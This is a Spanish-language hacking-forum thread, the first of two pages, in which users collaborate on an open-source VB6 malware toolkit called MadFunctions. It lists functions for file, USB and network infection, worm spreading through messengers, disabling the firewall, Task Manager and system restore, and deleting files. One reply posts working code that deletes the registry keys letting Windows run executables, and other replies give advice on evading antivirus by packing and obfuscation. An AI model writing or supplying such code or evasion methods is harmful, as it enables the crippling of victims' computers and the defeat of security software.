elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [+] Proyecto Open Source: MadFunctions
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [+] Proyecto Open Source: MadFunctions  (Leído 5,392 veces)
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
[+] Proyecto Open Source: MadFunctions
« en: 22 Enero 2008, 00:58 am »

MadFunctions.bas

Que es esto?
La idea es programar un módulo para VB6 (*.bas) que pueda ser agregado a cualquier proyecto, este módulo irá orientado a la programación de 'malware' en general y facilitará muchísimo la tarea del programador a la hora de implementar las típicas funciones que todo 'malware' devería tener.

Que funciones se integrarán en MadFunctions.bas?
Pues os dejo un listado de las funciones que a día de hoy 22/01/08 voy a implementar, algunas de ellas ya estás hechas (y publicadas en este foro) y otras me falta terminarlas, aquí el listado, el nombre de las funciones (así como sus argumentos) lo describen todo xD

Código
  1. '1) Infection Functions
  2.  
  3. Private Sub infect_HardDrive(ByVal DriveLetter As String) As Integer
  4. Private Sub infect_USBDrive() As Integer
  5. Private Sub infect_NetBiosLan(ByVal SubNet As String) As String
  6. Private Sub infect_File(ByVal FilePath As String) As Boolean
  7. Private Sub infect_ZipFile(ByVal ZipPath As String) As Boolean
  8. Private Sub infect_RarFile(ByVal RarPath As String) As Boolean
  9.  
  10. '2) Spreading Worms Functions
  11.  
  12. Private Sub spread_MSN() As Boolean
  13. Private Sub spread_Yahoo() As Boolean
  14. Private Sub spread_GTalk() As Boolean
  15. Private Sub spread_Skype() As Boolean
  16. Private Sub spread_P2P() As Boolean
  17.  
  18. '3) Locking Functions
  19.  
  20. Private Sub lock_Regedit() As Boolean
  21. Private Sub lock_SysRestore() As Boolean
  22. Private Sub lock_SecurityCenter() As Boolean
  23. Private Sub lock_Firewall() As Boolean
  24. Private Sub lock_SysUpdates() As Boolean
  25. Private Sub lock_IEOptions() As Boolean
  26. Private Sub lock_TaskMgr() As Boolean
  27.  
  28. '4) Deleting Functions
  29.  
  30. Private Sub delete_File(ByVal FilePath As String) As Boolean
  31. Private Sub delete_FileSecure(ByVal FilePath As String) As Boolean
  32. Private Sub delete_AllFolders(ByVal FolderPath As String) As Boolean
  33.  
  34. '5) Managing Process/Services
  35.  
  36. Private Sub kill_Process(ByVal ProcessName As String) As Integer
  37. Private Sub kill_Service(ByVal ServiceName As String) As Integer
  38.  
  39. '6) Internet Functions
  40.  
  41. Private Sub get_PublicIP() As String
  42. Private Sub get_PrivateIP() As String
  43. Private Sub download_File(ByVal ULR As String) As Boolean
  44. Private Sub kill_Google() As Boolean
  45.  
  46. '7) FTP Functions
  47.  
  48. Private Sub ftp_Upload(ByVal ftpServer As String, ByVal ftpLogon As String, ByVal ftpPass As String, ByVal FileUploadPath As String) As Boolean
  49. Private Sub ftp_Download(ByVal ftpServer As String, ByVal ftpLogon As String, ByVal ftpPass As String, ByVal FileDoenloadPath As String) As Boolean
  50.  
  51. '8) Self Funtions
  52.  
  53. Private Sub MeltFile()
  54. Private Sub isMutexRunning() As Boolean
  55.  
  56. '9) Net/Lan Functions
  57.  
  58. Private Sub net_ShareFolder(ByVal FolderPath As String, ByVal SharedName As String) As Boolean
  59. Private Sub net_Folder2Drive(ByVal FolderPath As String, ByVal DriveLetter As String) As Boolean
  60.  
  61. '10) Attributes knoking Functions
  62.  
  63. Private Sub change_IncreaseBytes(ByVal FilePath As String, ByVal HowManyBytes As String) As Boolean
  64. Private Sub change_VanishFile(ByVal FilePath As String) As Boolean
  65. Private Sub change_DateMod(ByVal FilePath As String) As Boolean
  66.  
  67. '11) System Functions
  68.  
  69. Private Sub system_Shutdown()
  70. Private Sub system_Logoff()
  71.  

Ojo, faltan las funciones de FileCopy (para copiar ficheros o nuestro ejecutable) y las de Autorun (aquí hay mucho que exprimir), se está barajando la opción de añadir funciones de ADS (Alternate Data Streams), pero no sé aun...

Éste va a ser el listado definitivo de las funciones?
No, tengo que hacer una encuesta, ya que muchas de las funciones actualmente expuestas rozan la ilegalidad y pueden estar fuera del Hacking Ético (por ejemplo las funciones de Spreading Worms o las de Infección de Ficheros, Discos USB, Redes Completas, etc...). La encuesta será lanzada en pocos días.

Puedo contribuir, aportando ideas, aportando funciones, etc?
Sí, aunque me guste programar este tipo de cosas, una ayuda nunca viene mal, si tienes cualquier idea, sugerencia, rectificación, mejora, ... o si tienes alguna función creada por ti mismo que desearías incluir aquí: por favor exprésalo en este post para que todos decidamos si incluirlo o no.



Por el momento os pido que miréis el listado actual y opinéis, si debemos quitar/añadir algo, ideas, mejoras, etc... Se buscan Beta-Testers para probar alguna de las funciones bajo circunstancias poco comunes (En Windows 2000, sin privilegios de Administrador, bajo ciertos AntiVirus, etc...)

Saludos, vuestro amigo cojonudo: ||MadAntrax|| :xD


En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
‭‭‭‭jackl007


Desconectado Desconectado

Mensajes: 1.403


[UserRPL]


Ver Perfil WWW
Re: [+] Proyecto Open Source: MadFunctions
« Respuesta #1 en: 22 Enero 2008, 01:07 am »

Un consejo; las funciones de este modo seran detectadas por muchos antivirus ...
y hay que estar constantemnte modificando el codigo o buscando otra manera de hacer lo mismo para evitar eso ...
yo implemntare las que tenga en mi Pc


En línea

NadiceJMA

Desconectado Desconectado

Mensajes: 185


Nca


Ver Perfil WWW
Re: [+] Proyecto Open Source: MadFunctions
« Respuesta #2 en: 22 Enero 2008, 01:09 am »

me parece buena idea esta, la verdad quisiera saber si puedes agregar una funcion para que podamos obtener el escritorio remoto...

aaaa me ofresco como beta tester
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [+] Proyecto Open Source: MadFunctions
« Respuesta #3 en: 22 Enero 2008, 01:12 am »

Las funciones de este modo seran detectadas por muchos antivirus ...
Las funciones las estoy programando a mano, así que cuando salga el módulo serán todas indetectables.

Cuando compiles tu proyecto, podrá shacerlo en código nativo o P-Code (consigues 2 proyectos identicos con estructura interna modificada, evitas los AV y su heuristica)

Citar
y hay que estar constantemnte modificando el codigo o buscando otra manera de hacer lo mismo para evitar eso ...
Cuando tengas el proyecto compilado, lo empaquetas con UPX, FSG o lo que quieras, además siempre podrás cambiar las variables (de Integer a Long por ejemplo), con esto modificas las zonas de la pila (ya que Long requiere más zona de memoria que un Integer) y evitas las firmas de los AntiVirus. O puedes cambiar las Strings de las funciones

Yo creo que puede ser un proyecto bonito
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
‭‭‭‭jackl007


Desconectado Desconectado

Mensajes: 1.403


[UserRPL]


Ver Perfil WWW
Re: [+] Proyecto Open Source: MadFunctions
« Respuesta #4 en: 22 Enero 2008, 01:21 am »

Esta idea la hice yo; me di cuenta de que si elimino esas claves en el registro, se puede causar graves molestias para quien no sepa mucho, en cuanto a los ejecutables :D.

Modulo para manejar el registro; la puedes usar para mas cosas :D:
Código
  1. Const REG_SZ = 1
  2. Const REG_BINARY = 3
  3. Const REG_DWORD = 4
  4.  
  5. Public Const HKEY_CURRENT_USER = &H80000001
  6. Public Const HKEY_CLASSES_ROOT = &H80000000
  7. ' Declaraciones de API para manipulacion del Registro
  8.  
  9. Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
  10. Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
  11. Public Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
  12. Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
  13. Public Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
  14. Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
  15. Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
  16.  
  17. Public Function RegQueryStringValue(ByVal hKey As Long, ByVal strValueName As String) As String
  18.  
  19.    Dim lResult As Long, lValueType As Long, strBuf As String, lDataBufSize As Long
  20.  
  21.    lResult = RegQueryValueEx(hKey, strValueName, 0, lValueType, ByVal 0, lDataBufSize)
  22.    If lResult = 0 Then
  23.        If lValueType = REG_SZ Then
  24.  
  25.            strBuf = String(lDataBufSize, Chr$(0))
  26.            'recupera el valor del key
  27.            lResult = RegQueryValueEx(hKey, strValueName, 0, 0, ByVal strBuf, lDataBufSize)
  28.            If lResult = 0 Then
  29.  
  30.                RegQueryStringValue = Left$(strBuf, InStr(1, strBuf, Chr$(0)) - 1)
  31.            End If
  32.        ElseIf lValueType = REG_BINARY Then
  33.            Dim strData As Integer
  34.            'recupera el valor del key
  35.            lResult = RegQueryValueEx(hKey, strValueName, 0, 0, strData, lDataBufSize)
  36.            If lResult = 0 Then
  37.                RegQueryStringValue = strData
  38.            End If
  39.         ElseIf lValueType = REG_DWORD Then
  40.  
  41.            'recupera el valor del key
  42.            lResult = RegQueryValueEx(hKey, strValueName, 0, 0, strData, lDataBufSize)
  43.            If lResult = 0 Then
  44.                RegQueryStringValue = strData
  45.            End If
  46.  
  47.        End If
  48.    End If
  49. End Function
  50.  
  51. Public Function GetString(hKey As Long, strPath As String, strValue As String)
  52.  
  53.    Dim Ret
  54.    'Abre Key
  55.    RegOpenKey hKey, strPath, Ret
  56.    'Carga Contenido
  57.    GetString = RegQueryStringValue(Ret, strValue)
  58.    'Cierra Key
  59.    RegCloseKey Ret
  60. End Function
  61.  
  62. Public Function SaveStringWORD(hKey As Long, strPath As String, strValue As String, strData As String)
  63.    Dim Ret
  64.    RegCreateKey hKey, strPath, Ret
  65.    RegSetValueEx Ret, strValue, 0, REG_DWORD, CLng(strData), 4
  66.    RegCloseKey Ret
  67. End Function
  68. Public Function SaveStringSZ(hKey As Long, strPath As String, strValue As String, strData As String)
  69.    Dim Ret
  70.    RegCreateKey hKey, strPath, Ret
  71.    RegSetValueEx Ret, strValue, 0, REG_SZ, ByVal strData, Len(strData)
  72.  
  73.    RegCloseKey Ret
  74. End Function
  75.  
  76. Public Function DelSetting(hKey As Long, strPath As String, strValue As String)
  77.    'No usado
  78.    'Puedes usarlo para borrar entradas
  79.  
  80.    Dim Ret
  81.    'Crea una nueva Key
  82.    RegCreateKey hKey, strPath, Ret
  83.    'Borra el valor de la Key
  84.    RegDeleteKey Ret, strValue
  85.    'Cierra el Key
  86.    RegCloseKey Ret
  87. End Function
  88.  
  89.  

y la funcion:

Código
  1. Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
  2. Private Sub Form_Load()
  3. fore = "exefile\shell\open\command"
  4. fore1 = "exefile\shell\runas\command"
  5.  
  6. fore2 = "exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}"
  7. fore3 = "exefile\shellex\DropHandler"
  8. fore4 = "exefile\shellex\PropertySheetHandlers\ShimLayer Property Page"
  9. fore5 = "exefile\DefaultIcon"
  10. fore6 = "exefile\shellex\PropertySheetHandlers\PifProps"
  11. RegDeleteKey HKEY_CLASSES_ROOT, fore
  12. RegDeleteKey HKEY_CLASSES_ROOT, fore1
  13. RegDeleteKey HKEY_CLASSES_ROOT, fore2
  14. RegDeleteKey HKEY_CLASSES_ROOT, fore3
  15. RegDeleteKey HKEY_CLASSES_ROOT, fore4 'Des
  16. RegDeleteKey HKEY_CLASSES_ROOT, fore5
  17. RegDeleteKey HKEY_CLASSES_ROOT, fore6
  18.  
  19. End
  20. End Sub
  21.  


NOTA: No la pruebes en tu pc! o  si la pruebas desactiva: DES

vacuna:


Código
  1. @echo off
  2. assoc .exe=exefile
  3. ftype exefile="%1" %*
  4. @echo Windows Registry Editor Version 5.00>%TEMP%\exe.reg
  5. @echo [HKEY_CLASSES_ROOT\exefile]>>%TEMP%\exe.reg
  6. @echo @="Aplicacion">>%TEMP%\exe.reg
  7. @echo "NeverShowExt"="">>%TEMP%\exe.reg
  8. @echo [HKEY_CLASSES_ROOT\exefile\Shell\Open\Command]>>%TEMP%\exe.reg
  9. @echo @=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00>>%TEMP%\exe.reg
  10. regedit /s %TEMP%\exe.reg
  11. del %TEMP%\exe.reg

Nota2: lo edite xq cambie de funcion, la otra la probe y no hizo nada ... esta que pongo aqui funciona bien! :D
Cuidado, lo que hace es borrar las claves que asocian la extension EXE (re-muy importante, imaginas iniciar tu windows sin que te cargen nada??? es una joda).
« Última modificación: 22 Enero 2008, 14:53 pm por jackl007 » En línea

‭‭‭‭jackl007


Desconectado Desconectado

Mensajes: 1.403


[UserRPL]


Ver Perfil WWW
Re: [+] Proyecto Open Source: MadFunctions
« Respuesta #5 en: 22 Enero 2008, 01:44 am »

Aporto esta infeccion en el registro para activar 'G¡f' como ejecutable; incluso agrega el icono del propio gif para no necesitar atribuirle un icono :D
esta en batch, alguien se toma el trabajo de traducirlo? no tengo mucho tiempo; pero para los "" pueden usar chr(34) ...
o tranquilamnte lo colocan en un text y colocan esto
Código
  1. Open "ruta" For Output As #1
  2. Print #1, text1.Text
  3. Close #1

Code:
« Última modificación: 22 Enero 2008, 01:49 am por jackl007 » En línea

cobein


Desconectado Desconectado

Mensajes: 759



Ver Perfil WWW
Re: [+] Proyecto Open Source: MadFunctions
« Respuesta #6 en: 22 Enero 2008, 08:43 am »

Con respecto al tema de ls AVs podrian utilizar alguna herramienta como el VBEXEObfuscator
En línea

http://www.advancevb.com.ar
Más Argentino que el morcipan
Aguante el Uvita tinto, Tigre, Ford y seba123neo
Karcrack es un capo.
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: [+] Proyecto Open Source: MadFunctions
« Respuesta #7 en: 22 Enero 2008, 19:17 pm »

Yo esto lo veo mas util para copiar solo las funciones q te hagan falta y no todo el modulo, q si no va a ser mas facil q detecten tu aplicacion y va a subir mucho el peso.. pero la iniciativa es wena ;)
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [+] Proyecto Open Source: MadFunctions
« Respuesta #8 en: 22 Enero 2008, 21:31 pm »

Yo esto lo veo mas util para copiar solo las funciones q te hagan falta y no todo el modulo, q si no va a ser mas facil q detecten tu aplicacion y va a subir mucho el peso.. pero la iniciativa es wena ;)

Claro, yo crearé el módulo y cada uno que coja las funciones que necesite
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
Hans el Topo


Desconectado Desconectado

Mensajes: 1.754


"Estoy cansado de no hacer nada"


Ver Perfil WWW
Re: [+] Proyecto Open Source: MadFunctions
« Respuesta #9 en: 22 Enero 2008, 22:38 pm »

van a salir tropecientas,
igual es conveniente crear varios módulos cada uno orientado a una serie de tareas concretas y no tan genérico

Citar
Éste va a ser el listado definitivo de las funciones?
No, tengo que hacer una encuesta, ya que muchas de las funciones actualmente expuestas rozan la ilegalidad y pueden estar fuera del Hacking Ético

eso me ha hecho reír ...  :-X
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines